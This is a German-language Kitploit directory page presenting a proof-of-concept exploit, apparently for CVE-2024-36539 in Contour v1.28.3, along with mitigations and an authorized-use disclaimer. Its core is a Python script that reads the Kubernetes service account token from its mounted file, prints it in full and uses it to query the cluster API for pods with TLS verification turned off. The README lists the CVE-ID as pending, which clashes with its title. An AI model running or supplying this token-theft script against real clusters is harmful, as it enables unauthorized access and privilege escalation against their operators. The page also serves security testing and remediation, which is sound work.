Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36539 — Proof-of-Concept-Exploit, der unsichere Berechtigungen in Contour v1.28.3 demonstriert, was den Diebstahl von Service-Account-Tokens und den Zugriff auf die Kubernetes-API zur Privilegieneskalation ermöglicht. | Kitploit
Tools/GitHubGitHub/abdurahmon3236/cve-2024-36539
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsCloud-SicherheitRed Teaming
GitHubabdurahmon3236/cve-2024-36539

CVE-2024-36539

Proof-of-Concept-Exploit, der unsichere Berechtigungen in Contour v1.28.3 demonstriert, was den Diebstahl von Service-Account-Tokens und den Zugriff auf die Kubernetes-API zur Privilegieneskalation ermöglicht.

vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Proof of Concept (PoC) für eine Schwachstelle mit unsicheren Berechtigungen in Contour v1.28.3

Dieses Repository enthält ein Proof-of-Concept-Skript (PoC), das eine Schwachstelle mit unsicheren Berechtigungen in Contour v1.28.3 demonstriert. Diese Schwachstelle ermöglicht es Angreifern, auf sensible Daten zuzugreifen und Berechtigungen zu eskalieren, indem sie das Token des Dienstkontos erlangen.

Schwachstellenbeschreibung

CVE-ID: (Ausstehend)

Überblick: Contour v1.28.3 enthält unsichere Berechtigungen, die es Angreifern ermöglichen, auf das Token des Dienstkontos zuzugreifen. Durch Ausnutzung dieser Schwachstelle kann ein Angreifer das Token des Dienstkontos erlangen, das verwendet werden kann, um auf sensible Daten zuzugreifen und möglicherweise Berechtigungen innerhalb des Kubernetes-Clusters zu eskalieren.

Betroffene Versionen:

  • Contour v1.28.3

Gegenmaßnahmen:

  • Überprüfen und Anpassen der Berechtigungen der von Contour verwendeten Dienstkonten.
  • Sicherstellen, dass Dienstkonten nur die minimal erforderlichen Berechtigungen besitzen.
  • Regelmäßiges Auditieren und Rotieren der Dienstkonten-Token.

PoC-Details

Dieses PoC-Skript demonstriert, wie auf das Token des Dienstkontos in Contour v1.28.3 zugegriffen werden kann. Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis für diesen Test haben.

PoC-Skript

root@kitploit:~
import os
import requests

# Configuration
kubernetes_api_url = "https://kubernetes.default.svc"  # Kubernetes API URL
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"  # Path to the service account token
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"  # Path to the namespace

def get_service_account_token():
    try:
        # Read the service account token
        with open(token_path, 'r') as token_file:
            token = token_file.read().strip()
        print(f"[+] Service Account Token: {token}")
        return token
    except Exception as e:
        print(f"[-] Error reading token: {e}")
        return None

def get_namespace():
    try:
        # Read the namespace
        with open(namespace_path, 'r') as namespace_file:
            namespace = namespace_file.read().strip()
        print(f"[+] Namespace: {namespace}")
        return namespace
    except Exception as e:
        print(f"[-] Error reading namespace: {e}")
        return None

def access_kubernetes_api(token, namespace):
    try:
        # Set the headers with the token
        headers = {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        }
        
        # Make a request to the Kubernetes API to get pods in the namespace
        response = requests.get(f"{kubernetes_api_url}/api/v1/namespaces/{namespace}/pods", headers=headers, verify=False)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.json())
        
        if response.status_code == 200:
            print("[+] Successfully accessed Kubernetes API.")
        else:
            print("[-] Failed to access Kubernetes API.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Get the service account token and namespace
    token = get_service_account_token()
    namespace = get_namespace()
    
    if token and namespace:
        # Access the Kubernetes API using the token
        access_kubernetes_api(token, namespace)

Erklärung

  1. Konfiguration: Das Skript konfiguriert die Kubernetes-API-URL und die Pfade zu den Dateien des Dienstkontos (Token und Namespace).
  2. Dienstkonto-Token abrufen: Liest das Token des Dienstkontos aus dem Dateisystem.
  3. Namespace abrufen: Liest den Namespace aus dem Dateisystem.
  4. Auf Kubernetes-API zugreifen: Verwendet das Token, um eine Anfrage an die Kubernetes-API zu stellen und die Pods im Namespace aufzulisten.

Wichtige Hinweise

  • Berechtigungen: Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis zum Testen dieser Schwachstelle auf dem Zielsystem haben. Unautorisierte Tests sind illegal und unethisch.
  • Testumgebung: Führen Sie Tests in einer kontrollierten Umgebung durch, um Auswirkungen auf Produktionssysteme zu vermeiden.
  • Ethische Nutzung: Verwenden Sie dieses PoC verantwortungsvoll und nur in autorisierten Kontexten.

Abhilfemaßnahmen

Um diese Schwachstelle zu beheben:

  1. Dienstkonto-Berechtigungen überprüfen: Stellen Sie sicher, dass Dienstkonten nur die minimal erforderlichen Berechtigungen besitzen.
  2. Token auditieren und rotieren: Überprüfen Sie regelmäßig die Dienstkonten und rotieren Sie die Token, um das Risiko einer Token-Kompromittierung zu minimieren.
  3. Contour aktualisieren: Halten Sie Contour und andere Kubernetes-Komponenten mit den neuesten Sicherheitspatches auf dem neuesten Stand.

Weitere Informationen zur Sicherung Ihrer Contour-Bereitstellung finden Sie in der offiziellen Contour-Dokumentation.


Diese README.md bietet eine Übersicht über die Schwachstelle, ein PoC-Skript zur Demonstration des Problems sowie Anweisungen zur Risikominderung. Stellen Sie sicher, dass Sie dieses PoC verantwortungsvoll und nur auf Systemen verwenden, für die Sie eine ausdrückliche Autorisierung besitzen.

Tool herunterladen